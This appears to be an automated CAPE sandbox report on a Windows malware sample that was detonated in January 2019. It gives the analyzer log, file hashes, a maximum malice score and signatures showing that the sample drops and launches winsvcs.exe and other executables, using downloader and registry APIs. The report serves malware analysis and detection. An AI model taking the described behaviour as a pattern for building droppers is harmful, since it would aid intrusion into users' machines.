CAPE

Triggered CAPE Tasks: Task #29486: Extraction


Analysis

Category Package Started Completed Duration Options Log
FILE exe 2019-01-10 03:26:33 2019-01-10 03:30:22 229 seconds Show Options Show Log
route = internet
procdump = 1
2019-01-10 03:26:34,015 [root] INFO: Date set to: 01-10-19, time set to: 03:26:34, timeout set to: 200
2019-01-10 03:26:34,078 [root] DEBUG: Starting analyzer from: C:\ntpzw
2019-01-10 03:26:34,078 [root] DEBUG: Storing results at: C:\zhGMWeN
2019-01-10 03:26:34,092 [root] DEBUG: Pipe server name: \\.\PIPE\npWkSkdt
2019-01-10 03:26:34,092 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-01-10 03:26:34,092 [root] INFO: Automatically selected analysis package "exe"
2019-01-10 03:26:35,434 [root] DEBUG: Started auxiliary module Browser
2019-01-10 03:26:35,434 [root] DEBUG: Started auxiliary module Curtain
2019-01-10 03:26:35,434 [modules.auxiliary.digisig] INFO: Skipping authenticode validation, signtool.exe was not found in bin/
2019-01-10 03:26:35,434 [root] DEBUG: Started auxiliary module DigiSig
2019-01-10 03:26:35,450 [root] DEBUG: Started auxiliary module Disguise
2019-01-10 03:26:35,450 [root] DEBUG: Started auxiliary module Human
2019-01-10 03:26:35,450 [root] DEBUG: Started auxiliary module Screenshots
2019-01-10 03:26:35,450 [root] DEBUG: Started auxiliary module Sysmon
2019-01-10 03:26:35,450 [root] DEBUG: Started auxiliary module Usage
2019-01-10 03:26:35,450 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2019-01-10 03:26:35,450 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2019-01-10 03:26:35,839 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe" with arguments "" with pid 1900
2019-01-10 03:26:35,839 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:26:35,839 [lib.api.process] INFO: 32-bit DLL to inject is C:\ntpzw\dll\XhylptW.dll, loader C:\ntpzw\bin\hnbsRRz.exe
2019-01-10 03:26:35,934 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1900
2019-01-10 03:26:37,946 [lib.api.process] INFO: Successfully resumed process with pid 1900
2019-01-10 03:26:37,946 [root] INFO: Added new process to list with pid: 1900
2019-01-10 03:26:38,148 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 03:26:38,148 [root] DEBUG: Process dumps enabled.
2019-01-10 03:26:38,243 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1900 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 03:26:38,243 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe".
2019-01-10 03:26:38,243 [root] INFO: Monitor successfully loaded in process with pid 1900.
2019-01-10 03:27:57,599 [root] DEBUG: set_caller_info: Adding region at 0x00280000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-01-10 03:27:57,647 [root] DEBUG: DLL loaded at 0x75370000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-01-10 03:27:57,661 [root] DEBUG: DLL loaded at 0x75530000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-01-10 03:27:57,661 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-01-10 03:27:57,661 [root] DEBUG: DLL loaded at 0x76790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-01-10 03:27:57,677 [root] DEBUG: DLL loaded at 0x768B0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-01-10 03:27:57,677 [root] DEBUG: DLL loaded at 0x76BD0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-01-10 03:27:57,709 [root] DEBUG: DLL loaded at 0x75B20000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-01-10 03:27:57,709 [root] INFO: Disabling sleep skipping.
2019-01-10 03:28:37,020 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-01-10 03:28:37,068 [root] INFO: Announced 32-bit process name: winsvcs.exe pid: 3040
2019-01-10 03:28:37,068 [root] INFO: Added new process to list with pid: 3040
2019-01-10 03:28:37,068 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:28:37,068 [lib.api.process] INFO: 32-bit DLL to inject is C:\ntpzw\dll\XhylptW.dll, loader C:\ntpzw\bin\hnbsRRz.exe
2019-01-10 03:28:37,068 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 3040
2019-01-10 03:28:37,068 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 03:28:37,068 [root] DEBUG: Process dumps enabled.
2019-01-10 03:28:37,068 [root] INFO: Disabling sleep skipping.
2019-01-10 03:28:37,084 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 3040 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 03:28:37,084 [root] DEBUG: Commandline: C:\Windows\5769805074060605\winsvcs.exe.
2019-01-10 03:28:37,084 [root] INFO: Monitor successfully loaded in process with pid 3040.
2019-01-10 03:28:37,582 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1900
2019-01-10 03:28:37,582 [root] DEBUG: GetHookCallerBase: thread 1052 (handle 0x0), return address 0x0040246C, allocation base 0x00400000.
2019-01-10 03:28:37,582 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-01-10 03:28:37,582 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-01-10 03:28:37,582 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001030.
2019-01-10 03:28:37,582 [root] INFO: Added new CAPE file to list with path: C:\zhGMWeN\CAPE\1900_6495603963748710412019
2019-01-10 03:28:37,582 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x3c00.
2019-01-10 03:28:37,598 [root] DEBUG: DLL unloaded from 0x75700000.
2019-01-10 03:28:37,614 [root] INFO: Notified of termination of process with pid 1900.
2019-01-10 03:28:37,644 [root] INFO: Process with pid 1900 has terminated
2019-01-10 03:29:28,188 [root] DEBUG: set_caller_info: Adding region at 0x002C0000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-01-10 03:29:28,204 [root] DEBUG: DLL loaded at 0x75370000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-01-10 03:29:28,220 [root] DEBUG: DLL loaded at 0x75530000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-01-10 03:29:28,220 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-01-10 03:29:28,236 [root] DEBUG: DLL loaded at 0x76790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-01-10 03:29:28,236 [root] DEBUG: DLL loaded at 0x768B0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-01-10 03:29:28,252 [root] DEBUG: DLL loaded at 0x76BD0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-01-10 03:29:28,266 [root] DEBUG: DLL loaded at 0x75B20000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-01-10 03:29:33,759 [root] DEBUG: DLL loaded at 0x74600000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-01-10 03:29:33,821 [root] DEBUG: DLL loaded at 0x74D90000: C:\Windows\system32\profapi (0xb000 bytes).
2019-01-10 03:29:33,836 [root] DEBUG: DLL loaded at 0x752D0000: C:\Windows\syswow64\ws2_32 (0x35000 bytes).
2019-01-10 03:29:33,836 [root] DEBUG: DLL loaded at 0x75850000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-01-10 03:29:33,836 [root] DEBUG: DLL loaded at 0x74DB0000: C:\Windows\system32\dnsapi (0x44000 bytes).
2019-01-10 03:29:33,836 [root] DEBUG: DLL loaded at 0x74D70000: C:\Windows\system32\iphlpapi (0x1c000 bytes).
2019-01-10 03:29:33,836 [root] DEBUG: DLL loaded at 0x74D60000: C:\Windows\system32\WINNSI (0x7000 bytes).
2019-01-10 03:29:33,836 [root] DEBUG: DLL unloaded from 0x77050000.
2019-01-10 03:29:33,836 [root] DEBUG: DLL loaded at 0x74D00000: C:\Windows\system32\RASAPI32 (0x52000 bytes).
2019-01-10 03:29:33,868 [root] DEBUG: DLL loaded at 0x74B80000: C:\Windows\system32\rasman (0x15000 bytes).
2019-01-10 03:29:33,882 [root] DEBUG: DLL loaded at 0x74B70000: C:\Windows\system32\rtutils (0xd000 bytes).
2019-01-10 03:29:33,882 [root] DEBUG: DLL unloaded from 0x74D00000.
2019-01-10 03:29:33,882 [root] DEBUG: DLL loaded at 0x74B60000: C:\Windows\system32\sensapi (0x6000 bytes).
2019-01-10 03:29:33,882 [root] DEBUG: DLL unloaded from 0x74B80000.
2019-01-10 03:29:33,882 [root] DEBUG: DLL unloaded from 0x75370000.
2019-01-10 03:29:33,898 [root] DEBUG: DLL loaded at 0x74E30000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-01-10 03:29:33,946 [root] DEBUG: DLL loaded at 0x74BB0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-01-10 03:29:33,960 [root] DEBUG: DLL loaded at 0x75860000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-01-10 03:29:33,976 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-01-10 03:29:33,993 [root] DEBUG: DLL unloaded from 0x75530000.
2019-01-10 03:29:34,039 [root] DEBUG: DLL loaded at 0x74E20000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-01-10 03:29:34,039 [root] DEBUG: DLL loaded at 0x74E00000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-01-10 03:29:34,039 [root] DEBUG: DLL loaded at 0x74F00000: C:\Windows\System32\mswsock (0x3c000 bytes).
2019-01-10 03:29:34,071 [root] DEBUG: DLL loaded at 0x74DA0000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-01-10 03:29:34,101 [root] DEBUG: DLL loaded at 0x74EF0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-01-10 03:29:34,117 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-01-10 03:29:34,117 [root] DEBUG: DLL loaded at 0x74B30000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2019-01-10 03:29:34,117 [root] DEBUG: DLL unloaded from 0x74D70000.
2019-01-10 03:29:34,117 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-01-10 03:29:34,164 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-01-10 03:29:34,180 [root] DEBUG: DLL loaded at 0x745A0000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-01-10 03:29:34,210 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-01-10 03:29:34,210 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-01-10 03:29:34,242 [root] DEBUG: DLL loaded at 0x74590000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-01-10 03:29:34,257 [root] DEBUG: DLL loaded at 0x74570000: C:\Windows\system32\DHCPCSVC (0x12000 bytes).
2019-01-10 03:29:34,289 [root] DEBUG: DLL loaded at 0x74560000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2019-01-10 03:29:34,289 [root] DEBUG: DLL unloaded from 0x74570000.
2019-01-10 03:29:34,506 [root] DEBUG: DLL unloaded from 0x77050000.
2019-01-10 03:29:34,506 [root] DEBUG: DLL loaded at 0x75520000: C:\Windows\syswow64\Normaliz (0x3000 bytes).
2019-01-10 03:29:36,551 [root] DEBUG: DLL unloaded from 0x75370000.
2019-01-10 03:29:42,494 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-01-10 03:29:42,509 [root] INFO: Announced 32-bit process name: 3635423912.exe pid: 840
2019-01-10 03:29:42,509 [root] INFO: Added new process to list with pid: 840
2019-01-10 03:29:42,509 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:29:42,540 [lib.api.process] INFO: 32-bit DLL to inject is C:\ntpzw\dll\XhylptW.dll, loader C:\ntpzw\bin\hnbsRRz.exe
2019-01-10 03:29:42,588 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 840
2019-01-10 03:29:42,604 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 03:29:42,618 [root] DEBUG: Process dumps enabled.
2019-01-10 03:29:42,618 [root] INFO: Disabling sleep skipping.
2019-01-10 03:29:42,634 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 840 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 03:29:42,634 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\3635423912.exe.
2019-01-10 03:29:42,634 [root] INFO: Monitor successfully loaded in process with pid 840.
2019-01-10 03:29:46,582 [root] DEBUG: DLL unloaded from 0x745A0000.
2019-01-10 03:29:46,582 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-01-10 03:29:46,582 [root] DEBUG: DLL unloaded from 0x75370000.
2019-01-10 03:29:46,924 [root] INFO: Announced 32-bit process name: 3843231898.exe pid: 2300
2019-01-10 03:29:46,940 [root] INFO: Added new process to list with pid: 2300
2019-01-10 03:29:46,971 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:29:47,019 [lib.api.process] INFO: 32-bit DLL to inject is C:\ntpzw\dll\XhylptW.dll, loader C:\ntpzw\bin\hnbsRRz.exe
2019-01-10 03:29:47,049 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2300
2019-01-10 03:29:47,096 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 03:29:47,142 [root] DEBUG: Process dumps enabled.
2019-01-10 03:29:47,206 [root] INFO: Disabling sleep skipping.
2019-01-10 03:29:47,253 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2300 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 03:29:47,299 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\3843231898.exe.
2019-01-10 03:29:47,361 [root] INFO: Monitor successfully loaded in process with pid 2300.
2019-01-10 03:29:48,157 [root] INFO: Announced 32-bit process name: 2658928598.exe pid: 2628
2019-01-10 03:29:48,234 [root] INFO: Added new process to list with pid: 2628
2019-01-10 03:29:48,282 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:29:48,423 [lib.api.process] INFO: 32-bit DLL to inject is C:\ntpzw\dll\XhylptW.dll, loader C:\ntpzw\bin\hnbsRRz.exe
2019-01-10 03:29:48,532 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2628
2019-01-10 03:29:48,625 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 03:29:48,734 [root] DEBUG: Process dumps enabled.
2019-01-10 03:29:48,875 [root] INFO: Disabling sleep skipping.
2019-01-10 03:29:48,983 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2628 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 03:29:49,108 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\2658928598.exe.
2019-01-10 03:29:49,233 [root] INFO: Monitor successfully loaded in process with pid 2628.
2019-01-10 03:29:49,374 [root] INFO: Announced 32-bit process name:  pid: 1636996
2019-01-10 03:29:49,483 [root] INFO: Added new process to list with pid: 1636996
2019-01-10 03:29:49,608 [lib.api.process] WARNING: The process with pid 1636996 is not alive, injection aborted
2019-01-10 03:29:49,888 [root] INFO: Process with pid 1636996 has terminated
2019-01-10 03:29:57,611 [root] DEBUG: DLL unloaded from 0x77050000.
2019-01-10 03:29:59,233 [root] INFO: Announced 32-bit process name: 4089713972.exe pid: 2416
2019-01-10 03:29:59,296 [root] INFO: Added new process to list with pid: 2416
2019-01-10 03:29:59,358 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:29:59,483 [lib.api.process] INFO: 32-bit DLL to inject is C:\ntpzw\dll\XhylptW.dll, loader C:\ntpzw\bin\hnbsRRz.exe
2019-01-10 03:29:59,592 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2416
2019-01-10 03:29:59,670 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 03:29:59,779 [root] DEBUG: Process dumps enabled.
2019-01-10 03:29:59,950 [root] INFO: Disabling sleep skipping.
2019-01-10 03:30:00,091 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2416 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 03:30:00,200 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\4089713972.exe.
2019-01-10 03:30:00,371 [root] INFO: Monitor successfully loaded in process with pid 2416.
2019-01-10 03:30:00,543 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-01-10 03:30:00,653 [root] INFO: Created shutdown mutex.
2019-01-10 03:30:01,806 [root] INFO: Setting terminate event for process 3040.
2019-01-10 03:30:02,026 [root] DEBUG: Terminate Event: Attempting to dump process 3040
2019-01-10 03:30:02,213 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-01-10 03:30:02,306 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-01-10 03:30:02,400 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001030.
2019-01-10 03:30:02,477 [root] INFO: Setting terminate event for process 840.
2019-01-10 03:30:02,884 [root] INFO: Added new CAPE file to list with path: C:\zhGMWeN\CAPE\3040_144236448230310412019
2019-01-10 03:30:02,993 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x3c00.
2019-01-10 03:30:03,039 [root] INFO: Announced 32-bit process name: 3527325130.exe pid: 2084
2019-01-10 03:30:03,071 [root] INFO: Setting terminate event for process 2300.
2019-01-10 03:30:03,132 [root] INFO: Added new process to list with pid: 2084
2019-01-10 03:30:03,243 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:30:03,430 [lib.api.process] INFO: 32-bit DLL to inject is C:\ntpzw\dll\XhylptW.dll, loader C:\ntpzw\bin\hnbsRRz.exe
2019-01-10 03:30:03,555 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2084
2019-01-10 03:30:03,694 [root] INFO: Setting terminate event for process 2628.
2019-01-10 03:30:03,710 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 03:30:03,898 [root] DEBUG: Process dumps enabled.
2019-01-10 03:30:04,115 [root] INFO: Disabling sleep skipping.
2019-01-10 03:30:04,256 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2084 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 03:30:04,319 [root] INFO: Setting terminate event for process 2416.
2019-01-10 03:30:04,427 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\3527325130.exe.
2019-01-10 03:30:04,615 [root] INFO: Monitor successfully loaded in process with pid 2084.
2019-01-10 03:30:04,959 [root] INFO: Setting terminate event for process 2084.
2019-01-10 03:30:05,582 [root] INFO: Shutting down package.
2019-01-10 03:30:05,739 [root] INFO: Stopping auxiliary modules.
2019-01-10 03:30:05,816 [root] INFO: Finishing auxiliary modules.
2019-01-10 03:30:05,878 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-01-10 03:30:05,940 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-02 target-02 ESX 2019-01-10 03:26:33 2019-01-10 03:30:17

File Details

File Name 2019-01-08-initial-malware-retrieved-by-JS-file.exe
File Size 144384 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 77067974a70af43a3cadf88219d1e28c
SHA1 7aa8fd4d0e0f44a4ed37f8542f7a1b0bc9faa58c
SHA256 4c0103c745fa6e173821035c304863d751bea9c073d19070d9ebf8685da95040
SHA512 9872bcfd51d5e05d17ad23410326744c13d6d757a998867043a906475cde22daa0ab523bedbf430b8e48043c340e382c74978089ecf0e39cd56d4797b60cc09d
CRC32 9BD949DF
Ssdeep 1536:EJuqJbIXcA+Uli+SR1rJ0Fgc/7rSmOnVO1en5n/bFzhvYCvCY1AbIwLVbV56:yLJbIXjPkSgnzDHFCjbI8V
TrID
  • 61.9% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
  • 13.0% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 8.9% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 4.0% (.EXE) OS/2 Executable (generic) (2029/13)
  • 4.0% (.EXE) Clipper DOS Executable (2018/12)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Download Download ZIP Resubmit sample

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Behavioural detection: Executable code extraction
Creates RWX memory
Possible date expiration check, exits too soon after checking local time
process: Izu2hJvy.exe, PID 1900
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/fclose
DynamicLoader: msvcrt.dll/fseek
DynamicLoader: msvcrt.dll/ftell
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_wfopen
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: Izu2hJvy.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/fclose
DynamicLoader: msvcrt.dll/fseek
DynamicLoader: msvcrt.dll/ftell
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_wfopen
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: winsvcs.exe/atexit
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/Module32FirstW
Drops a binary and executes it
binary: C:\Windows\5769805074060605\winsvcs.exe
binary: C:\Users\user\AppData\Local\Temp\3635423912.exe
